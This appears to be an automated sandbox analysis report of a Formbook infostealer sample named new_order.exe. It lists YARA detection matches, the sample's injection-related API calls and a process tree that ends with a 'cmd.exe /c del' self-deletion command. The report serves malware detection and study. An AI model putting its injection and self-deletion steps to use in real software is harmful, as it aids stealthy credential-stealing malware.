          Source: 00000003.00000002.754910561.00000000004C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.688696186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.688696186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.723911761.000000000E954000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.723911761.000000000E954000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.946503989.0000000000850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.946503989.0000000000850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.687734511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.687734511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.754825305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.754825305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.755193140.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.755193140.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious name
          Source: initial sampleStatic PE information: Filename: new_order.exe
          Source: new_order.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 3.0.new_order.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.new_order.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.new_order.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.new_order.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.new_order.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.new_order.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.new_order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.new_order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.new_order.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.new_order.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.new_order.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.new_order.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.new_order.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.new_order.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.new_order.exe.1acb0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.new_order.exe.1acb0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.new_order.exe.1acb0000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.new_order.exe.1acb0000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.698671664.000000001ACB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.698671664.000000001ACB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.946218609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.946218609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.946443311.0000000000820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.946443311.0000000000820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.738390030.000000000E954000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.738390030.000000000E954000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.754910561.00000000004C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.754910561.00000000004C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.688696186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.688696186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.723911761.000000000E954000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.723911761.000000000E954000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.946503989.0000000000850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.946503989.0000000000850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.687734511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.687734511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.754825305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.754825305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.755193140.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.755193140.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\new_order.exeCode function: 1_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\new_order.exeCode function: 1_2_0040604C
          Source: C:\Users\user\Desktop\new_order.exeCode function: 1_2_00404772
          Source: C:\Users\user\Desktop\new_order.exeCode function: 1_2_02180A17
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00401030
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_0041DB0E
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_0041EB8D
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_0041E5DC
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00402D90
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_0041D596
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00409E4B
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00409E50
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_0041EFC2
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00402FB0
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A820A0
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00B220A8
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A6B090
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00B11002
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A74120
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A5F900
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00B222AE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0491B090
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0491841F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049C1002
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04932581
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0491D5E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0490F900
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04900D20
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04924120
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049D1D55
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04926E30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0493EBB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0041DB0E
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0041EB8D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0041E5DC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_00402D90
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0041D596
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_00409E4B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_00409E50
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0041EFC2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_00402FB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 0490B150 appears 32 times
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_0041A350 NtCreateFile,
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_0041A400 NtReadFile,
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_0041A480 NtClose,
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_0041A530 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_0041A3A2 NtCreateFile,
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_0041A47A NtClose,
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_0041A52A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A998F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A99860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A99840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A999A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A99910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A99A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A99A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A99A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A995D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A99540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A996E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A99660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A997A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A99780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A99710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A998A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A99820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A9B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A999D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A99950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A99A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04949840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04949860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049499A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049495D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04949910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04949540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049496D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049496E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04949650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04949A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04949660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04949780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04949FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04949710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049498A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049498F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04949820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0494B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049499D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049495F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0494AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04949520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04949950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04949560 NtWriteFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04949A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04949610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04949A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04949A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04949A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04949670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0494A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049497A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0494A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04949B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04949730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04949770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0494A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04949760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0041A350 NtCreateFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0041A400 NtReadFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0041A480 NtClose,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0041A530 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0041A3A2 NtCreateFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0041A47A NtClose,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0041A52A NtAllocateVirtualMemory,
          Source: new_order.exe, 00000001.00000003.688386050.000000001AF9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs new_order.exe
          Source: new_order.exe, 00000001.00000003.685072751.000000001AE06000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs new_order.exe
          Source: new_order.exe, 00000003.00000002.756160019.0000000000CDF000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs new_order.exe
          Source: new_order.exe, 00000003.00000002.757240625.00000000029AE000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameEXPLORER.EXEj% vs new_order.exe
          Source: new_order.exe, 00000003.00000002.755889616.0000000000B4F000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs new_order.exe
          Source: new_order.exe, 00000003.00000003.690131310.0000000000806000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs new_order.exe
          Source: C:\Users\user\Desktop\new_order.exeFile read: C:\Users\user\Desktop\new_order.exeJump to behavior
          Source: new_order.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\new_order.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\new_order.exe "C:\Users\user\Desktop\new_order.exe"
          Source: C:\Users\user\Desktop\new_order.exeProcess created: C:\Users\user\Desktop\new_order.exe "C:\Users\user\Desktop\new_order.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\new_order.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
